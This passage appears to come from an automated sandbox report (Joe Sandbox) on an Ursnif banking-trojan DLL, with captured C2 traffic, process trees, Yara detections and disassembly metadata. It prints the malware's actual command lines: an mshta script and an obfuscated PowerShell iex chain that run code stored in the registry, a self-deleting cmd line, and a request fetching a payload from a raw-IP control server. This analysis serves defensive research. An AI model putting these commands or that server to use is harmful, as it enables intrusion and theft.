                          Data Raw: 0d d0 78 03 6f 92 61 23 67 e6 9e 88 65 db b7 56 fe e1 de fb 13 d3 18 26 ae 47 89 71 80 4a 1e ee 8f 73 55 99 f7 ca 63 91 65 b6 72 2e 16 be 7a 96 35 1c a9 72 27 b7 70 ba 2e d8 19 86 aa df 2a 70 9e f8 49 b4 d3 d4 2e 76 35 f2 c1 39 92 3b bf fc c9 29 bb 33 97 3a be dd a8 7f a9 b5 d6 46 62 25 26 a2 fb d7 09 93 11 88 ae 97 1f ce e8 ca 7c 60 f7 51 d4 ee 5e 0d 16 6b 7e 84 35 4d 2d 0f 60 a7 84 8f e5 bb 44 ef d6 dc c3 44 9d ea 67 28 e7 4e 9a ff 5c 44 3c 34 3d 6a 06 91 35 ae 7f ac af f3 5c c6 0d 05 ac 3c 1a bd 18 16 63 35 25 86 15 7f 65 88 92 28 8b 00 22 4e 35 59 bc e5 68 af 43 b2 d4 14 f8 01 f6 30 15 8c c0 5f ae 16 46 c6 1c 05 d6 25 7b fb 69 ac b0 ef 2e 3b 27 36 2e 7f 89 9e f5 75 8f eb fd 1a a3 8b 23 78 d8 c0 96 24 82 0c 1d 93 34 39 7b c3 8a 0a 45 31 59 10 ac 38 ac a9 bc 4f 03 48 da 67 0d 2a 8c 61 1f b6 ee 8a a1 c8 2c 90 3b 96 80 34 d6 a4 0f 4e ca c5 c4 82 46 8f 0d d7 7f cf 3b 3b 60 ef 41 d9 44 dc bf 23 40 52 75 24 47 33 5f 08 15 46 f5 da 60 ff 80 b8 d8 34 a9 86 0b 1a 3f ba dd ce 38 8f 2a 12 b3 e5 0c 6c 58 5c 25 fe 3b 01 7d 61 f5 b4 33 8f f2 29 bb 0e cc b1 3b cd ce 4b cc 8d af eb 84 b6 61 63 1e 65 4e fb 81 b8 8f a3 03 63 7a a6 64 d8 71 ae dd 22 50 73 d0 4d 4d ee 20 0e 7e 16 a3 7a 85 b7 3c 6a d6 73 b2 f9 08 fb 3b 10 42 e5 3b a1 d7 16 a3 5f 42 90 0f 38 05 f6 95 44 1a 78 e1 44 b4 80 42 54 73 53 37 2b 73 74 74 fa 2a 16 3d 08 3b 3b 6a e9 03 48 d2 1a 95 91 27 6e 7c db 02 15 bb 73 84 09 5b f8 db 94 c3 24 6a d2 19 97 f2 cf 15 11 2a e1 55 9f c8 4d d4 05 44 7f 9c e0 5a 9b 68 d1 7c eb 7a 85 27 33 7e 6f c3 95 3d 87 fc 65 55 04 c1 4b bb a4 11 8e b6 ad f9 0a be 2e 55 1d 11 25 ba 08 99 ed 00 59 5a 27 74 40 e8 b3 68 8c c5 b0 c6 9b 68 f6 91 cc 06 18 e9 71 3c 58 9d 67 e6 9c 01 d0 53 6b ba 8a 94 ad 6b e1 8f 4e e7 94 8d 5b e9 a1 0e 21 09 3e 3d a6 ee 20 79 b3 e8 9d 9d 98 07 b6 22 7d 17 e6 6d 61 2b a9 19 1d f2 54 a5 54 7a 5f 50 cc db 58 5b 60 3d 87 a3 38 17 da 48 02 76 91 45 b3 d1 6c cb 43 e7 36 98 f1 ba a3 d2 f0 5c 7a 90 a4 aa ba b1 da c3 37 76 1a 9d 24 97 3b 09 a9 c5 52 fa c4 1e ba 9a d2 d7 20 51 60 4b 92 7b fd 61 ad 9e 4d 1b 0d b5 36 f7 55 49 83 62 0e 0d c7 df 8a ce 55 22 b6 75 b4 c0 4c 83 71 40 35 0d 23 5d 18 0f 9e 46 bd 86 68 ef fb 74 ae ee 1a 31 4c 7b 68 98 2c 79 f7 4a c3 6c 80 c8 ac 78 9f c8 7b 4a 17 b2 f2 b3 ae 37 d8 5c 94 0f 7f 67 e3 c3 12 04 fa 74 33 93 22 0d fd 95 74 4f c8 2a 41 4d b2 65 4b 2c b7 c4 9b 4b 54 61 8b 14 c4 b7 6a 3a fd 1f 18 87 d1 51 f3 b5 9d bf 04 67 cd fd a0 38 2b 70 02 f2 6e 97 28 00 ea b9 54 99 56 71 a8 9e 7e 28 01 fa 4c b7 5c 4c 5e da d6 8e 3a bd e0 84 06 d0 59 84 63 d6 7e bf f9 94 fe a6 bb ea cc 79 50 fb 42 ce 44 20 05 50 e9 cb ab a1 ad 1b 20 d2 ee 74 0b 45 3f 96 c7 3e 53 90 8d 4a fa a4 5a ca 93 ef d2 12 ab 0c 40 62 70 c5 c4 3e b1 fb 21 e9 a0 fe a2 1f ba 9c 58 a5 59 7c 58 9d 7f b4 48 55 e4 31 1e 57 fa 9b 5b 5a 10 c6 7d 83 6b 40 01 a6 68 dd 94 5c 4a cf da 1e 32 e0 dc 5f 0a d1 d8 d9 fd fd d9 4c 02 39 29 72 9b fa 5e ee 7b d3 0a fd 5a 05 c2 5c 0b a7 cb 6d 31 cc e5 0d 85 8a 3e 27 73 d9 ef 08 0e ca a3 cf d7 b4 07 b9 6b 69 a3 30 f7 07 4e 39
                          Data Ascii: xoa#geV&GqJsUcer.z5r'p.*pI.v59;)3:Fb%&|`Q^k~5M-`DDg(N\D<4=j5\<c5%e("N5YhC0_F%{i.;'6.u#x$49{E1Y8OHg*a,;4NF;;`AD#@Ru$G3_F`4?8*lX\%;}a3);KaceNczdq"PsMM ~z<js;B;_B8DxDBTsS7+stt*=;;jH'n|s[$j*UMDZh|z'3~o=eUK.U%YZ't@hhq<XgSkkN[!>= y"}ma+TTz_PX[`=8HvElC6\z7v$;R Q`K{aM6UIbU"uLq@5#]Fht1L{h,yJlx{J7\gt3"tO*AMeK,KTaj:Qg8+pn(TVq~(L\L^:Yc~yPBD P tE?>SJZ@bp>!XY|XHU1W[Z}k@h\J2_L9)r^{Z\m1>'ski0N9
                          May 26, 2022 04:06:53.058631897 CEST1707OUTGET /drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlk HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: 176.10.119.68
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          May 26, 2022 04:06:53.344055891 CEST1708INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 May 2022 02:06:53 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 1870
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="628ee0bd4ef97.bin"
                          Data Raw: 16 73 69 31 09 06 6d 67 f0 e8 32 67 f7 0a 83 93 06 b9 df f8 37 51 1c 9d 9c 07 14 8f dc 5f 0c a3 1b 40 e9 a6 4f 90 34 e9 29 61 44 14 68 59 01 07 9d 75 5f 14 0d 89 33 23 dc 16 33 c5 a1 b7 2a 2b 04 69 ac be 28 5a 15 ed 24 be 2e 0a d4 54 44 07 1c 3c a1 5f 82 95 2b ec 34 ec ff 8e 52 c3 14 cb 86 87 b4 22 9b 54 47 47 e2 b0 56 01 6f 6f ee 38 14 2f 39 e9 c3 5e b7 d2 86 a1 f7 28 2e 2b bc 8f 66 4a 99 ea 61 ce 3d eb 59 2b 32 ba 1f 6d 95 cd 1a 43 93 dd b1 e6 b8 a6 fe 00 03 2d 11 b4 6a 10 e7 19 e4 3f f5 bf 36 04 79 00 58 c4 d0 12 4c e0 35 90 db c0 87 eb 8a a8 93 2b a7 7c cf f0 68 31 3b 31 68 d3 d7 e9 64 1f 3e bf 79 bc 42 80 b8 c0 b0 c9 5a 23 dd 78 10 86 f8 30 44 87 ba 6c 75 5c d2 80 bd c3 14 03 9f 17 fd f7 f0 4a a6 4f da c2 53 be e6 99 70 40 bd a6 a1 d9 12 51 8e e9 8d 99 45 7b cd fd ba 10 b0 85 d3 0d cc 62 b0 82 02 8b d7 51 51 5c c7 7f 57 85 c7 1c 7d e8 4c c2 59 39 c7 f0 6d 72 2a 86 ef a4 4e c8 bc f0 c3 44 f1 e7 b7 d4 6a b1 c0 5d a0 f6 06 06 86 79 68 a0 04 75 95 68 64 35 a7 2b 10 c3 89 9b 92 05 4f a9 16 a1 6e a4 5b 65 f3 a0 d3 ee 2a 5f a7 a2 51 72 0f 3d 08 fe da b8 eb 54 5d 8b a1 4d af 3b ae a8 29 d1 fe 8f e8 ae b8 0e 78 84 1e f4 78 5d 35 39 2d 2b 9d a4 cd 46 ae a1 68 ea 17 21 0c 5b 39 91 53 97 61 5d af 25 af 50 60 48 02 fa 0d 74 fa de 26 e9 9b 15 5f 12 6c bd 24 fe 44 c8 bc 86 b6 34 a6 35 f5 52 c2 e9 d1 ca af 12 31 9a 6b aa a0 7a 79 95 b6 1e 8b 83 29 b7 b2 85 18 5d 31 3c 0b 29 f4 1c ea a0 d9 d9 84 d3 c5 4a 7f 11 44 20 e2 1e c4 27 8d 17 5a 5f a1 e8 1e cb 8f ab 3f a9 9e 2f dd 48 35 0b 41 9e 48 8a 4c 9b 15 1a d4 43 66 80 ca 89 34 a5 de b0 d5 fb 6c 45 30 ee 1b 22 3f 5e 42 ff 82 a5 97 e5 c5 d5 41 6e 55 ff f7 70 a9 ae da 49 ed fb c3 40 18 37 db 1e 14 0b 72 0c ca 7e 17 bc 5f ab ab 3f 50 8f 71 10 b8 94 56 5a 37 6e 4b 94 31 8c aa 32 dc c2 5a d1 67 8d 1c b4 f9 8b 51 e2 c2 3c 19 8b c5 ff 49 28 68 17 97 6e 26 73 0e 2b 97 a3 4d 77 5a 3e 92 19 b3 d7 5c a1 ec e4 cb 05 30 73 ee 02 04 30 fa e3 6e 87 78 20 2d c1 4a 06 0e 8e e6 fc 00 08 5e e2 a7 fe 72 4c d2 b7 4a 82 1e 37 d3 b4 6a ae b7 d0 27 2a 31 c9 22 03 9e f0 6d a1 8c f9 47 3e f2 d8 98 93 bb 3c 16 ae f6 25 f2 9b 91 e3 dc 57 df 9d cf a5 28 4f 75 c7 a7 c4 81 2f fc 7f 4a a1 df 87 68 bc f7 66 c1 2c 48 91 ce 0e 96 f9 68 1f a5 66 36 3b 39 14 02 be 06 aa aa b6 60 70 d6 fe 13 eb 16 ca 2f 1c 81 b6 e2 1d 04 1e 2e 53 4c 94 46 f8 56 ed 5e fd 3d 48 cd 87 b7 04 0a 31 b5 9e 3a f4 e8 45 30 8b fd 23 a4 01 8a 20 6a ae 83 02 f6 26 81 38 97 69 db 72 e2 83 c8 13 a4 38 f3 04 bb f6 53 a7 62 04 1d ed 09 6b 32 6e ec 8a 2c 93 81 78 90 73 16 0d 4e e5 b0 98 c1 33 fd 26 a6 07 7d e5 72 41 30 5c 00 ff 8a b7 2f 96 71 b6 f9 7b 8f 67 7d a1 cd ed 16 4d 16 cc a1 d6 9f c2 08 5b 62 ed c9 01 1a 4a 0b 71 72 be 28 be eb 5d ea 9b 23 60 bb 90 51 33 ea 0f e3 f6 5c 11 d0 4e 7f f2 69 49 8f 45 fa 88 86 36 3d 00 f8 ca 46 9c 18 c5 e3 38 2a a5 b4 04 f4 66 f6 29 cb ce 7b 91 f1 cd a4 e3 14 4f 52 ac 7f 45 d7 4b c5 58 40 43 98 c4 44 6e 78 13 b7 d8 84 35 8e 32 af b6 ff b0 78 97 60 91 1b 75 84 fd d8 4c d2 b2 32 2c 87 b3 18 e3 fc 42 2c 52 90 26 be 18 ba 3b 3c cd e8 f2 d1
                          Data Ascii: si1mg2g7Q_@O4)aDhYu_3#3*+i(Z$.TD<_+4R"TGGVoo8/9^(.+fJa=Y+2mC-j?6yXL5+|h1;1hd>yBZ#x0Dlu\JOSp@QE{bQQ\W}LY9mr*NDj]yhuhd5+On[e*_Qr=T]M;)xx]59-+Fh![9Sa]%P`Ht&_l$D45R1kzy)]1<)JD 'Z_?/H5AHLCf4lE0"?^BAnUpI@7r~_?PqVZ7nK12ZgQ<I(hn&s+MwZ>\0s0nx -J^rLJ7j'*1"mG><%W(Ou/Jhf,Hhf6;9`p/.SLFV^=H1:E0# j&8ir8Sbk2n,xsN3&}rA0\/q{g}M[bJqr(]#`Q3\NiIE6=F8*f){OREKX@CDnx52x`uL2,B,R&;<


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:04:06:08
                          Start date:26/05/2022
                          Path:C:\Windows\System32\loaddll32.exe
                          Wow64 process (32bit):true
                          Commandline:loaddll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll"
                          Imagebase:0x2d0000
                          File size:116736 bytes
                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:1
                          Start time:04:06:08
                          Start date:26/05/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1
                          Imagebase:0xc20000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:2
                          Start time:04:06:09
                          Start date:26/05/2022
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1
                          Imagebase:0xb70000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294564948.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294395671.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294731571.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.338694096.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294789206.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.339724690.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.339835630.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294648025.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294608365.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.294468322.0000000005538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.452738390.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.340707199.000000000533C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Target ID:4
                          Start time:04:06:10
                          Start date:26/05/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 272
                          Imagebase:0xf30000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:7
                          Start time:04:06:14
                          Start date:26/05/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 396
                          Imagebase:0xf30000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:11
                          Start time:04:06:19
                          Start date:26/05/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 424
                          Imagebase:0xf30000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:24
                          Start time:04:06:57
                          Start date:26/05/2022
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kxac='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kxac).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7fd340000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:26
                          Start time:04:06:59
                          Start date:26/05/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                          Imagebase:0x7ff746f80000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Target ID:27
                          Start time:04:06:59
                          Start date:26/05/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7c9170000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:28
                          Start time:04:07:09
                          Start date:26/05/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdline
                          Imagebase:0x7ff729ff0000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Reputation:moderate

                          General

                          Target ID:29
                          Start time:04:07:11
                          Start date:26/05/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE691.tmp" "c:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP"
                          Imagebase:0x7ff639440000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          General

                          Target ID:30
                          Start time:04:07:15
                          Start date:26/05/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdline
                          Imagebase:0x7ff729ff0000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET

                          General

                          Target ID:33
                          Start time:04:07:17
                          Start date:26/05/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE5F.tmp" "c:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP"
                          Imagebase:0x7ff639440000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          General

                          Target ID:34
                          Start time:04:07:18
                          Start date:26/05/2022
                          Path:C:\Windows\System32\control.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\control.exe -h
                          Imagebase:0x7ff61b8e0000
                          File size:117760 bytes
                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000022.00000000.406864821.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000022.00000000.405146209.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000022.00000000.404521640.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                          General

                          Target ID:37
                          Start time:04:07:25
                          Start date:26/05/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff6b8cf0000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          General

                          Target ID:44
                          Start time:04:07:44
                          Start date:26/05/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll
                          Imagebase:0x7ff63f4a0000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          General

                          Target ID:45
                          Start time:04:07:45
                          Start date:26/05/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7c9170000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:10%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:14
                            Total number of Limit Nodes:2
                            execution_graph 250 401520 251 40152c 250->251 255 401541 250->255 253 401567 251->253 259 401500 251->259 256 401567 255->256 257 40152c 255->257 258 401500 GetBinaryTypeA 257->258 258->255 262 40ba80 259->262 265 401360 262->265 264 401509 264->251 267 401379 265->267 266 401469 GetBinaryTypeA 268 4013a3 266->268 267->266 267->268 268->264

                            Callgraph

                            Executed Functions

                            Function 00401360 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 401360-401398 call 40baa0 * 2 5 4014e8-4014ff 0->5 6 40139e-4014c3 0->6 6->5 8 4014c5 6->8 11 401454 8->11 12 40145b-401467 8->12 13 401469-4014b0 GetBinaryTypeA 11->13 12->13 14 4014ca-4014e0 12->14 17 4013a3-40140f call 40c1c0 13->17 18 4014b6 13->18 15 401456 14->15 16 4014e6 14->16 15->5 16->13 17->5 18->15
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.278334254.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.278330403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.278347125.000000000040B000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.278350774.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.278353950.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.278358414.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.278361545.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.278385412.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                            Similarity
                            • API ID: BinaryType
                            • String ID:
                            • API String ID: 3726996659-0
                            • Opcode ID: 445511c6e937446b3ab29b19c79851b54fb7788d52c464d718082ff33a7e5e7a
                            • Instruction ID: 678d90c2e14f759a0a694654a23e79d3ffc57d339712660e24010735e9a51d0b
                            • Opcode Fuzzy Hash: 445511c6e937446b3ab29b19c79851b54fb7788d52c464d718082ff33a7e5e7a
                            • Instruction Fuzzy Hash: 424176B0A00205CFDB08DFA8C5953AA7BB1EB45308F64816ED405AF3A1C73AD946CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 04F700DC Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
